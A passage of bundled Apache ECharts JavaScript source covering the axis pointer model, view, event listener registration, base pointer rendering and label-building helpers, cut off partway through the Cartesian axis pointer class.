Diff.\n    var toHighlight = [];\n    var toDownplay = [];\n    each$1(lastHighlights, function (batchItem, key) {\n        !newHighlights[key] && toDownplay.push(batchItem);\n    });\n    each$1(newHighlights, function (batchItem, key) {\n        !lastHighlights[key] && toHighlight.push(batchItem);\n    });\n\n    toDownplay.length && api.dispatchAction({\n        type: 'downplay', escapeConnect: true, batch: toDownplay\n    });\n    toHighlight.length && api.dispatchAction({\n        type: 'highlight', escapeConnect: true, batch: toHighlight\n    });\n}\n\nfunction findInputAxisInfo(inputAxesInfo, axisInfo) {\n    for (var i = 0; i < (inputAxesInfo || []).length; i++) {\n        var inputAxisInfo = inputAxesInfo[i];\n        if (axisInfo.axis.dim === inputAxisInfo.axisDim\n            && axisInfo.axis.model.componentIndex === inputAxisInfo.axisIndex\n        ) {\n            return inputAxisInfo;\n        }\n    }\n}\n\nfunction makeMapperParam(axisInfo) {\n    var axisModel = axisInfo.axis.model;\n    var item = {};\n    var dim = item.axisDim = axisInfo.axis.dim;\n    item.axisIndex = item[dim + 'AxisIndex'] = axisModel.componentIndex;\n    item.axisName = item[dim + 'AxisName'] = axisModel.name;\n    item.axisId = item[dim + 'AxisId'] = axisModel.id;\n    return item;\n}\n\nfunction illegalPoint(point) {\n    return !point || point[0] == null || isNaN(point[0]) || point[1] == null || isNaN(point[1]);\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar AxisPointerModel = extendComponentModel({\n\n    type: 'axisPointer',\n\n    coordSysAxesInfo: null,\n\n    defaultOption: {\n        // 'auto' means that show when triggered by tooltip or handle.\n        show: 'auto',\n        // 'click' | 'mousemove' | 'none'\n        triggerOn: null, // set default in AxisPonterView.js\n\n        zlevel: 0,\n        z: 50,\n\n        type: 'line', // 'line' 'shadow' 'cross' 'none'.\n        // axispointer triggered by tootip determine snap automatically,\n        // see `modelHelper`.\n        snap: false,\n        triggerTooltip: true,\n\n        value: null,\n        status: null, // Init value depends on whether handle is used.\n\n        // [group0, group1, ...]\n        // Each group can be: {\n        //      mapper: function () {},\n        //      singleTooltip: 'multiple',  // 'multiple' or 'single'\n        //      xAxisId: ...,\n        //      yAxisName: ...,\n        //      angleAxisIndex: ...\n        // }\n        // mapper: can be ignored.\n        //      input: {axisInfo, value}\n        //      output: {axisInfo, value}\n        link: [],\n\n        // Do not set 'auto' here, otherwise global animation: false\n        // will not effect at this axispointer.\n        animation: null,\n        animationDurationUpdate: 200,\n\n        lineStyle: {\n            color: '#aaa',\n            width: 1,\n            type: 'solid'\n        },\n\n        shadowStyle: {\n            color: 'rgba(150,150,150,0.3)'\n        },\n\n        label: {\n            show: true,\n            formatter: null, // string | Function\n            precision: 'auto', // Or a number like 0, 1, 2 ...\n            margin: 3,\n            color: '#fff',\n            padding: [5, 7, 5, 7],\n            backgroundColor: 'auto', // default: axis line color\n            borderColor: null,\n            borderWidth: 0,\n            shadowBlur: 3,\n            shadowColor: '#aaa'\n            // Considering applicability, common style should\n            // better not have shadowOffset.\n            // shadowOffsetX: 0,\n            // shadowOffsetY: 2\n        },\n\n        handle: {\n            show: false,\n            /* eslint-disable */\n            icon: 'M10.7,11.9v-1.3H9.3v1.3c-4.9,0.3-8.8,4.4-8.8,9.4c0,5,3.9,9.1,8.8,9.4h1.3c4.9-0.3,8.8-4.4,8.8-9.4C19.5,16.3,15.6,12.2,10.7,11.9z M13.3,24.4H6.7v-1.2h6.6z M13.3,22H6.7v-1.2h6.6z M13.3,19.6H6.7v-1.2h6.6z', // jshint ignore:line\n            /* eslint-enable */\n            size: 45,\n            // handle margin is from symbol center to axis, which is stable when circular move.\n            margin: 50,\n            // color: '#1b8bbd'\n            // color: '#2f4554'\n            color: '#333',\n            shadowBlur: 3,\n            shadowColor: '#aaa',\n            shadowOffsetX: 0,\n            shadowOffsetY: 2,\n\n            // For mobile performance\n            throttle: 40\n        }\n    }\n\n});\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar inner$10 = makeInner();\nvar each$15 = each$1;\n\n/**\n * @param {string} key\n * @param {module:echarts/ExtensionAPI} api\n * @param {Function} handler\n *      param: {string} currTrigger\n *      param: {Array.<number>} point\n */\nfunction register(key, api, handler) {\n    if (env$1.node) {\n        return;\n    }\n\n    var zr = api.getZr();\n    inner$10(zr).records || (inner$10(zr).records = {});\n\n    initGlobalListeners(zr, api);\n\n    var record = inner$10(zr).records[key] || (inner$10(zr).records[key] = {});\n    record.handler = handler;\n}\n\nfunction initGlobalListeners(zr, api) {\n    if (inner$10(zr).initialized) {\n        return;\n    }\n\n    inner$10(zr).initialized = true;\n\n    useHandler('click', curry(doEnter, 'click'));\n    useHandler('mousemove', curry(doEnter, 'mousemove'));\n    // useHandler('mouseout', onLeave);\n    useHandler('globalout', onLeave);\n\n    function useHandler(eventType, cb) {\n        zr.on(eventType, function (e) {\n            var dis = makeDispatchAction(api);\n\n            each$15(inner$10(zr).records, function (record) {\n                record && cb(record, e, dis.dispatchAction);\n            });\n\n            dispatchTooltipFinally(dis.pendings, api);\n        });\n    }\n}\n\nfunction dispatchTooltipFinally(pendings, api) {\n    var showLen = pendings.showTip.length;\n    var hideLen = pendings.hideTip.length;\n\n    var actuallyPayload;\n    if (showLen) {\n        actuallyPayload = pendings.showTip[showLen - 1];\n    }\n    else if (hideLen) {\n        actuallyPayload = pendings.hideTip[hideLen - 1];\n    }\n    if (actuallyPayload) {\n        actuallyPayload.dispatchAction = null;\n        api.dispatchAction(actuallyPayload);\n    }\n}\n\nfunction onLeave(record, e, dispatchAction) {\n    record.handler('leave', null, dispatchAction);\n}\n\nfunction doEnter(currTrigger, record, e, dispatchAction) {\n    record.handler(currTrigger, e, dispatchAction);\n}\n\nfunction makeDispatchAction(api) {\n    var pendings = {\n        showTip: [],\n        hideTip: []\n    };\n    // FIXME\n    // better approach?\n    // 'showTip' and 'hideTip' can be triggered by axisPointer and tooltip,\n    // which may be conflict, (axisPointer call showTip but tooltip call hideTip);\n    // So we have to add \"final stage\" to merge those dispatched actions.\n    var dispatchAction = function (payload) {\n        var pendingList = pendings[payload.type];\n        if (pendingList) {\n            pendingList.push(payload);\n        }\n        else {\n            payload.dispatchAction = dispatchAction;\n            api.dispatchAction(payload);\n        }\n    };\n\n    return {\n        dispatchAction: dispatchAction,\n        pendings: pendings\n    };\n}\n\n/**\n * @param {string} key\n * @param {module:echarts/ExtensionAPI} api\n */\nfunction unregister(key, api) {\n    if (env$1.node) {\n        return;\n    }\n    var zr = api.getZr();\n    var record = (inner$10(zr).records || {})[key];\n    if (record) {\n        inner$10(zr).records[key] = null;\n    }\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar AxisPointerView = extendComponentView({\n\n    type: 'axisPointer',\n\n    render: function (globalAxisPointerModel, ecModel, api) {\n        var globalTooltipModel = ecModel.getComponent('tooltip');\n        var triggerOn = globalAxisPointerModel.get('triggerOn')\n            || (globalTooltipModel && globalTooltipModel.get('triggerOn') || 'mousemove|click');\n\n        // Register global listener in AxisPointerView to enable\n        // AxisPointerView to be independent to Tooltip.\n        register(\n            'axisPointer',\n            api,\n            function (currTrigger, e, dispatchAction) {\n                // If 'none', it is not controlled by mouse totally.\n                if (triggerOn !== 'none'\n                    && (currTrigger === 'leave' || triggerOn.indexOf(currTrigger) >= 0)\n                ) {\n                    dispatchAction({\n                        type: 'updateAxisPointer',\n                        currTrigger: currTrigger,\n                        x: e && e.offsetX,\n                        y: e && e.offsetY\n                    });\n                }\n            }\n        );\n    },\n\n    /**\n     * @override\n     */\n    remove: function (ecModel, api) {\n        unregister(api.getZr(), 'axisPointer');\n        AxisPointerView.superApply(this._model, 'remove', arguments);\n    },\n\n    /**\n     * @override\n     */\n    dispose: function (ecModel, api) {\n        unregister('axisPointer', api);\n        AxisPointerView.superApply(this._model, 'dispose', arguments);\n    }\n\n});\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar inner$11 = makeInner();\nvar clone$4 = clone;\nvar bind$2 = bind;\n\n/**\n * Base axis pointer class in 2D.\n * Implemenents {module:echarts/component/axis/IAxisPointer}.\n */\nfunction BaseAxisPointer() {\n}\n\nBaseAxisPointer.prototype = {\n\n    /**\n     * @private\n     */\n    _group: null,\n\n    /**\n     * @private\n     */\n    _lastGraphicKey: null,\n\n    /**\n     * @private\n     */\n    _handle: null,\n\n    /**\n     * @private\n     */\n    _dragging: false,\n\n    /**\n     * @private\n     */\n    _lastValue: null,\n\n    /**\n     * @private\n     */\n    _lastStatus: null,\n\n    /**\n     * @private\n     */\n    _payloadInfo: null,\n\n    /**\n     * In px, arbitrary value. Do not set too small,\n     * no animation is ok for most cases.\n     * @protected\n     */\n    animationThreshold: 15,\n\n    /**\n     * @implement\n     */\n    render: function (axisModel, axisPointerModel, api, forceRender) {\n        var value = axisPointerModel.get('value');\n        var status = axisPointerModel.get('status');\n\n        // Bind them to `this`, not in closure, otherwise they will not\n        // be replaced when user calling setOption in not merge mode.\n        this._axisModel = axisModel;\n        this._axisPointerModel = axisPointerModel;\n        this._api = api;\n\n        // Optimize: `render` will be called repeatly during mouse move.\n        // So it is power consuming if performing `render` each time,\n        // especially on mobile device.\n        if (!forceRender\n            && this._lastValue === value\n            && this._lastStatus === status\n        ) {\n            return;\n        }\n        this._lastValue = value;\n        this._lastStatus = status;\n\n        var group = this._group;\n        var handle = this._handle;\n\n        if (!status || status === 'hide') {\n            // Do not clear here, for animation better.\n            group && group.hide();\n            handle && handle.hide();\n            return;\n        }\n        group && group.show();\n        handle && handle.show();\n\n        // Otherwise status is 'show'\n        var elOption = {};\n        this.makeElOption(elOption, value, axisModel, axisPointerModel, api);\n\n        // Enable change axis pointer type.\n        var graphicKey = elOption.graphicKey;\n        if (graphicKey !== this._lastGraphicKey) {\n            this.clear(api);\n        }\n        this._lastGraphicKey = graphicKey;\n\n        var moveAnimation = this._moveAnimation =\n            this.determineAnimation(axisModel, axisPointerModel);\n\n        if (!group) {\n            group = this._group = new Group();\n            this.createPointerEl(group, elOption, axisModel, axisPointerModel);\n            this.createLabelEl(group, elOption, axisModel, axisPointerModel);\n            api.getZr().add(group);\n        }\n        else {\n            var doUpdateProps = curry(updateProps$1, axisPointerModel, moveAnimation);\n            this.updatePointerEl(group, elOption, doUpdateProps, axisPointerModel);\n            this.updateLabelEl(group, elOption, doUpdateProps, axisPointerModel);\n        }\n\n        updateMandatoryProps(group, axisPointerModel, true);\n\n        this._renderHandle(value);\n    },\n\n    /**\n     * @implement\n     */\n    remove: function (api) {\n        this.clear(api);\n    },\n\n    /**\n     * @implement\n     */\n    dispose: function (api) {\n        this.clear(api);\n    },\n\n    /**\n     * @protected\n     */\n    determineAnimation: function (axisModel, axisPointerModel) {\n        var animation = axisPointerModel.get('animation');\n        var axis = axisModel.axis;\n        var isCategoryAxis = axis.type === 'category';\n        var useSnap = axisPointerModel.get('snap');\n\n        // Value axis without snap always do not snap.\n        if (!useSnap && !isCategoryAxis) {\n            return false;\n        }\n\n        if (animation === 'auto' || animation == null) {\n            var animationThreshold = this.animationThreshold;\n            if (isCategoryAxis && axis.getBandWidth() > animationThreshold) {\n                return true;\n            }\n\n            // It is important to auto animation when snap used. Consider if there is\n            // a dataZoom, animation will be disabled when too many points exist, while\n            // it will be enabled for better visual effect when little points exist.\n            if (useSnap) {\n                var seriesDataCount = getAxisInfo(axisModel).seriesDataCount;\n                var axisExtent = axis.getExtent();\n                // Approximate band width\n                return Math.abs(axisExtent[0] - axisExtent[1]) / seriesDataCount > animationThreshold;\n            }\n\n            return false;\n        }\n\n        return animation === true;\n    },\n\n    /**\n     * add {pointer, label, graphicKey} to elOption\n     * @protected\n     */\n    makeElOption: function (elOption, value, axisModel, axisPointerModel, api) {\n        // Shoule be implemenented by sub-class.\n    },\n\n    /**\n     * @protected\n     */\n    createPointerEl: function (group, elOption, axisModel, axisPointerModel) {\n        var pointerOption = elOption.pointer;\n        if (pointerOption) {\n            var pointerEl = inner$11(group).pointerEl = new graphic[pointerOption.type](\n                clone$4(elOption.pointer)\n            );\n            group.add(pointerEl);\n        }\n    },\n\n    /**\n     * @protected\n     */\n    createLabelEl: function (group, elOption, axisModel, axisPointerModel) {\n        if (elOption.label) {\n            var labelEl = inner$11(group).labelEl = new Rect(\n                clone$4(elOption.label)\n            );\n\n            group.add(labelEl);\n            updateLabelShowHide(labelEl, axisPointerModel);\n        }\n    },\n\n    /**\n     * @protected\n     */\n    updatePointerEl: function (group, elOption, updateProps$$1) {\n        var pointerEl = inner$11(group).pointerEl;\n        if (pointerEl && elOption.pointer) {\n            pointerEl.setStyle(elOption.pointer.style);\n            updateProps$$1(pointerEl, {shape: elOption.pointer.shape});\n        }\n    },\n\n    /**\n     * @protected\n     */\n    updateLabelEl: function (group, elOption, updateProps$$1, axisPointerModel) {\n        var labelEl = inner$11(group).labelEl;\n        if (labelEl) {\n            labelEl.setStyle(elOption.label.style);\n            updateProps$$1(labelEl, {\n                // Consider text length change in vertical axis, animation should\n                // be used on shape, otherwise the effect will be weird.\n                shape: elOption.label.shape,\n                position: elOption.label.position\n            });\n\n            updateLabelShowHide(labelEl, axisPointerModel);\n        }\n    },\n\n    /**\n     * @private\n     */\n    _renderHandle: function (value) {\n        if (this._dragging || !this.updateHandleTransform) {\n            return;\n        }\n\n        var axisPointerModel = this._axisPointerModel;\n        var zr = this._api.getZr();\n        var handle = this._handle;\n        var handleModel = axisPointerModel.getModel('handle');\n\n        var status = axisPointerModel.get('status');\n        if (!handleModel.get('show') || !status || status === 'hide') {\n            handle && zr.remove(handle);\n            this._handle = null;\n            return;\n        }\n\n        var isInit;\n        if (!this._handle) {\n            isInit = true;\n            handle = this._handle = createIcon(\n                handleModel.get('icon'),\n                {\n                    cursor: 'move',\n                    draggable: true,\n                    onmousemove: function (e) {\n                        // Fot mobile devicem, prevent screen slider on the button.\n                        stop(e.event);\n                    },\n                    onmousedown: bind$2(this._onHandleDragMove, this, 0, 0),\n                    drift: bind$2(this._onHandleDragMove, this),\n                    ondragend: bind$2(this._onHandleDragEnd, this)\n                }\n            );\n            zr.add(handle);\n        }\n\n        updateMandatoryProps(handle, axisPointerModel, false);\n\n        // update style\n        var includeStyles = [\n            'color', 'borderColor', 'borderWidth', 'opacity',\n            'shadowColor', 'shadowBlur', 'shadowOffsetX', 'shadowOffsetY'\n        ];\n        handle.setStyle(handleModel.getItemStyle(null, includeStyles));\n\n        // update position\n        var handleSize = handleModel.get('size');\n        if (!isArray(handleSize)) {\n            handleSize = [handleSize, handleSize];\n        }\n        handle.attr('scale', [handleSize[0] / 2, handleSize[1] / 2]);\n\n        createOrUpdate(\n            this,\n            '_doDispatchAxisPointer',\n            handleModel.get('throttle') || 0,\n            'fixRate'\n        );\n\n        this._moveHandleToValue(value, isInit);\n    },\n\n    /**\n     * @private\n     */\n    _moveHandleToValue: function (value, isInit) {\n        updateProps$1(\n            this._axisPointerModel,\n            !isInit && this._moveAnimation,\n            this._handle,\n            getHandleTransProps(this.getHandleTransform(\n                value, this._axisModel, this._axisPointerModel\n            ))\n        );\n    },\n\n    /**\n     * @private\n     */\n    _onHandleDragMove: function (dx, dy) {\n        var handle = this._handle;\n        if (!handle) {\n            return;\n        }\n\n        this._dragging = true;\n\n        // Persistent for throttle.\n        var trans = this.updateHandleTransform(\n            getHandleTransProps(handle),\n            [dx, dy],\n            this._axisModel,\n            this._axisPointerModel\n        );\n        this._payloadInfo = trans;\n\n        handle.stopAnimation();\n        handle.attr(getHandleTransProps(trans));\n        inner$11(handle).lastProp = null;\n\n        this._doDispatchAxisPointer();\n    },\n\n    /**\n     * Throttled method.\n     * @private\n     */\n    _doDispatchAxisPointer: function () {\n        var handle = this._handle;\n        if (!handle) {\n            return;\n        }\n\n        var payloadInfo = this._payloadInfo;\n        var axisModel = this._axisModel;\n        this._api.dispatchAction({\n            type: 'updateAxisPointer',\n            x: payloadInfo.cursorPoint[0],\n            y: payloadInfo.cursorPoint[1],\n            tooltipOption: payloadInfo.tooltipOption,\n            axesInfo: [{\n                axisDim: axisModel.axis.dim,\n                axisIndex: axisModel.componentIndex\n            }]\n        });\n    },\n\n    /**\n     * @private\n     */\n    _onHandleDragEnd: function (moveAnimation) {\n        this._dragging = false;\n        var handle = this._handle;\n        if (!handle) {\n            return;\n        }\n\n        var value = this._axisPointerModel.get('value');\n        // Consider snap or categroy axis, handle may be not consistent with\n        // axisPointer. So move handle to align the exact value position when\n        // drag ended.\n        this._moveHandleToValue(value);\n\n        // For the effect: tooltip will be shown when finger holding on handle\n        // button, and will be hidden after finger left handle button.\n        this._api.dispatchAction({\n            type: 'hideTip'\n        });\n    },\n\n    /**\n     * Should be implemenented by sub-class if support `handle`.\n     * @protected\n     * @param {number} value\n     * @param {module:echarts/model/Model} axisModel\n     * @param {module:echarts/model/Model} axisPointerModel\n     * @return {Object} {position: [x, y], rotation: 0}\n     */\n    getHandleTransform: null,\n\n    /**\n     * * Should be implemenented by sub-class if support `handle`.\n     * @protected\n     * @param {Object} transform {position, rotation}\n     * @param {Array.<number>} delta [dx, dy]\n     * @param {module:echarts/model/Model} axisModel\n     * @param {module:echarts/model/Model} axisPointerModel\n     * @return {Object} {position: [x, y], rotation: 0, cursorPoint: [x, y]}\n     */\n    updateHandleTransform: null,\n\n    /**\n     * @private\n     */\n    clear: function (api) {\n        this._lastValue = null;\n        this._lastStatus = null;\n\n        var zr = api.getZr();\n        var group = this._group;\n        var handle = this._handle;\n        if (zr && group) {\n            this._lastGraphicKey = null;\n            group && zr.remove(group);\n            handle && zr.remove(handle);\n            this._group = null;\n            this._handle = null;\n            this._payloadInfo = null;\n        }\n    },\n\n    /**\n     * @protected\n     */\n    doClear: function () {\n        // Implemented by sub-class if necessary.\n    },\n\n    /**\n     * @protected\n     * @param {Array.<number>} xy\n     * @param {Array.<number>} wh\n     * @param {number} [xDimIndex=0] or 1\n     */\n    buildLabel: function (xy, wh, xDimIndex) {\n        xDimIndex = xDimIndex || 0;\n        return {\n            x: xy[xDimIndex],\n            y: xy[1 - xDimIndex],\n            width: wh[xDimIndex],\n            height: wh[1 - xDimIndex]\n        };\n    }\n};\n\nBaseAxisPointer.prototype.constructor = BaseAxisPointer;\n\n\nfunction updateProps$1(animationModel, moveAnimation, el, props) {\n    // Animation optimize.\n    if (!propsEqual(inner$11(el).lastProp, props)) {\n        inner$11(el).lastProp = props;\n        moveAnimation\n            ? updateProps(el, props, animationModel)\n            : (el.stopAnimation(), el.attr(props));\n    }\n}\n\nfunction propsEqual(lastProps, newProps) {\n    if (isObject$1(lastProps) && isObject$1(newProps)) {\n        var equals = true;\n        each$1(newProps, function (item, key) {\n            equals = equals && propsEqual(lastProps[key], item);\n        });\n        return !!equals;\n    }\n    else {\n        return lastProps === newProps;\n    }\n}\n\nfunction updateLabelShowHide(labelEl, axisPointerModel) {\n    labelEl[axisPointerModel.get('label.show') ? 'show' : 'hide']();\n}\n\nfunction getHandleTransProps(trans) {\n    return {\n        position: trans.position.slice(),\n        rotation: trans.rotation || 0\n    };\n}\n\nfunction updateMandatoryProps(group, axisPointerModel, silent) {\n    var z = axisPointerModel.get('z');\n    var zlevel = axisPointerModel.get('zlevel');\n\n    group && group.traverse(function (el) {\n        if (el.type !== 'group') {\n            z != null && (el.z = z);\n            zlevel != null && (el.zlevel = zlevel);\n            el.silent = silent;\n        }\n    });\n}\n\nenableClassExtend(BaseAxisPointer);\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/**\n * @param {module:echarts/model/Model} axisPointerModel\n */\nfunction buildElStyle(axisPointerModel) {\n    var axisPointerType = axisPointerModel.get('type');\n    var styleModel = axisPointerModel.getModel(axisPointerType + 'Style');\n    var style;\n    if (axisPointerType === 'line') {\n        style = styleModel.getLineStyle();\n        style.fill = null;\n    }\n    else if (axisPointerType === 'shadow') {\n        style = styleModel.getAreaStyle();\n        style.stroke = null;\n    }\n    return style;\n}\n\n/**\n * @param {Function} labelPos {align, verticalAlign, position}\n */\nfunction buildLabelElOption(\n    elOption, axisModel, axisPointerModel, api, labelPos\n) {\n    var value = axisPointerModel.get('value');\n    var text = getValueLabel(\n        value, axisModel.axis, axisModel.ecModel,\n        axisPointerModel.get('seriesDataIndices'),\n        {\n            precision: axisPointerModel.get('label.precision'),\n            formatter: axisPointerModel.get('label.formatter')\n        }\n    );\n    var labelModel = axisPointerModel.getModel('label');\n    var paddings = normalizeCssArray$1(labelModel.get('padding') || 0);\n\n    var font = labelModel.getFont();\n    var textRect = getBoundingRect(text, font);\n\n    var position = labelPos.position;\n    var width = textRect.width + paddings[1] + paddings[3];\n    var height = textRect.height + paddings[0] + paddings[2];\n\n    // Adjust by align.\n    var align = labelPos.align;\n    align === 'right' && (position[0] -= width);\n    align === 'center' && (position[0] -= width / 2);\n    var verticalAlign = labelPos.verticalAlign;\n    verticalAlign === 'bottom' && (position[1] -= height);\n    verticalAlign === 'middle' && (position[1] -= height / 2);\n\n    // Not overflow ec container\n    confineInContainer(position, width, height, api);\n\n    var bgColor = labelModel.get('backgroundColor');\n    if (!bgColor || bgColor === 'auto') {\n        bgColor = axisModel.get('axisLine.lineStyle.color');\n    }\n\n    elOption.label = {\n        shape: {x: 0, y: 0, width: width, height: height, r: labelModel.get('borderRadius')},\n        position: position.slice(),\n        // TODO: rich\n        style: {\n            text: text,\n            textFont: font,\n            textFill: labelModel.getTextColor(),\n            textPosition: 'inside',\n            textPadding: paddings,\n            fill: bgColor,\n            stroke: labelModel.get('borderColor') || 'transparent',\n            lineWidth: labelModel.get('borderWidth') || 0,\n            shadowBlur: labelModel.get('shadowBlur'),\n            shadowColor: labelModel.get('shadowColor'),\n            shadowOffsetX: labelModel.get('shadowOffsetX'),\n            shadowOffsetY: labelModel.get('shadowOffsetY')\n        },\n        // Lable should be over axisPointer.\n        z2: 10\n    };\n}\n\n// Do not overflow ec container\nfunction confineInContainer(position, width, height, api) {\n    var viewWidth = api.getWidth();\n    var viewHeight = api.getHeight();\n    position[0] = Math.min(position[0] + width, viewWidth) - width;\n    position[1] = Math.min(position[1] + height, viewHeight) - height;\n    position[0] = Math.max(position[0], 0);\n    position[1] = Math.max(position[1], 0);\n}\n\n/**\n * @param {number} value\n * @param {module:echarts/coord/Axis} axis\n * @param {module:echarts/model/Global} ecModel\n * @param {Object} opt\n * @param {Array.<Object>} seriesDataIndices\n * @param {number|string} opt.precision 'auto' or a number\n * @param {string|Function} opt.formatter label formatter\n */\nfunction getValueLabel(value, axis, ecModel, seriesDataIndices, opt) {\n    value = axis.scale.parse(value);\n    var text = axis.scale.getLabel(\n        // If `precision` is set, width can be fixed (like '12.00500'), which\n        // helps to debounce when when moving label.\n        value, {precision: opt.precision}\n    );\n    var formatter = opt.formatter;\n\n    if (formatter) {\n        var params = {\n            value: getAxisRawValue(axis, value),\n            axisDimension: axis.dim,\n            axisIndex: axis.index,\n            seriesData: []\n        };\n        each$1(seriesDataIndices, function (idxItem) {\n            var series = ecModel.getSeriesByIndex(idxItem.seriesIndex);\n            var dataIndex = idxItem.dataIndexInside;\n            var dataParams = series && series.getDataParams(dataIndex);\n            dataParams && params.seriesData.push(dataParams);\n        });\n\n        if (isString(formatter)) {\n            text = formatter.replace('{value}', text);\n        }\n        else if (isFunction$1(formatter)) {\n            text = formatter(params);\n        }\n    }\n\n    return text;\n}\n\n/**\n * @param {module:echarts/coord/Axis} axis\n * @param {number} value\n * @param {Object} layoutInfo {\n *  rotation, position, labelOffset, labelDirection, labelMargin\n * }\n */\nfunction getTransformedPosition(axis, value, layoutInfo) {\n    var transform = create$1();\n    rotate(transform, transform, layoutInfo.rotation);\n    translate(transform, transform, layoutInfo.position);\n\n    return applyTransform$1([\n        axis.dataToCoord(value),\n        (layoutInfo.labelOffset || 0)\n            + (layoutInfo.labelDirection || 1) * (layoutInfo.labelMargin || 0)\n    ], transform);\n}\n\nfunction buildCartesianSingleLabelElOption(\n    value, elOption, layoutInfo, axisModel, axisPointerModel, api\n) {\n    var textLayout = AxisBuilder.innerTextLayout(\n        layoutInfo.rotation, 0, layoutInfo.labelDirection\n    );\n    layoutInfo.labelMargin = axisPointerModel.get('label.margin');\n    buildLabelElOption(elOption, axisModel, axisPointerModel, api, {\n        position: getTransformedPosition(axisModel.axis, value, layoutInfo),\n        align: textLayout.textAlign,\n        verticalAlign: textLayout.textVerticalAlign\n    });\n}\n\n/**\n * @param {Array.<number>} p1\n * @param {Array.<number>} p2\n * @param {number} [xDimIndex=0] or 1\n */\nfunction makeLineShape(p1, p2, xDimIndex) {\n    xDimIndex = xDimIndex || 0;\n    return {\n        x1: p1[xDimIndex],\n        y1: p1[1 - xDimIndex],\n        x2: p2[xDimIndex],\n        y2: p2[1 - xDimIndex]\n    };\n}\n\n/**\n * @param {Array.<number>} xy\n * @param {Array.<number>} wh\n * @param {number} [xDimIndex=0] or 1\n */\nfunction makeRectShape(xy, wh, xDimIndex) {\n    xDimIndex = xDimIndex || 0;\n    return {\n        x: xy[xDimIndex],\n        y: xy[1 - xDimIndex],\n        width: wh[xDimIndex],\n        height: wh[1 - xDimIndex]\n    };\n}\n\nfunction makeSectorShape(cx, cy, r0, r, startAngle, endAngle) {\n    return {\n        cx: cx,\n        cy: cy,\n        r0: r0,\n        r: r,\n        startAngle: startAngle,\n        endAngle: endAngle,\n        clockwise: true\n    };\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar CartesianAxisPointer = BaseAxisPointer.extend({\n\n    /**\n     * @override\n     */\n    makeElOption: function (elOption, value, axisModel, axisPointerModel, api) {\n        var axis = axisModel.axis;\n        var grid = axis.grid;\n        var axisPointerType = axisPointerModel.get('type');\n        var otherExtent = getCartesian(grid, axis).getOtherAxis(axis).getGlobalExtent();\n        var pixelValue = axis.toGlobalCoord(axis.dataToCoord(value, true));\n\n        if (axisPointerType && axisPointerType !== 'none') {\n            var elStyle = buildElStyle(axisPointerModel);\n            var pointerOption = pointerShapeBuilder[axisPointerType](\n                axis, pixelValue, otherExtent\n            );\n            pointerOption.style = elStyle;\n            elOption.graphicKey = pointerOption.type;\n            elOption.pointer = pointerOption;\n        }\n\n        var layoutInfo = layout$1(grid.model, axisModel);\n        buildCartesianSingleLabelElOption(\n            value, elOption, layoutInfo, axisModel, axisPointerModel, api\n        );\n    },\n\n    /**\n     * @override\n     */\n    getHandleTransform: function (value, axisModel, axisPointerModel) {\n        var layoutInfo = layout$1(axisModel.axis.grid.model, axisModel, {\n            labelInside: false\n        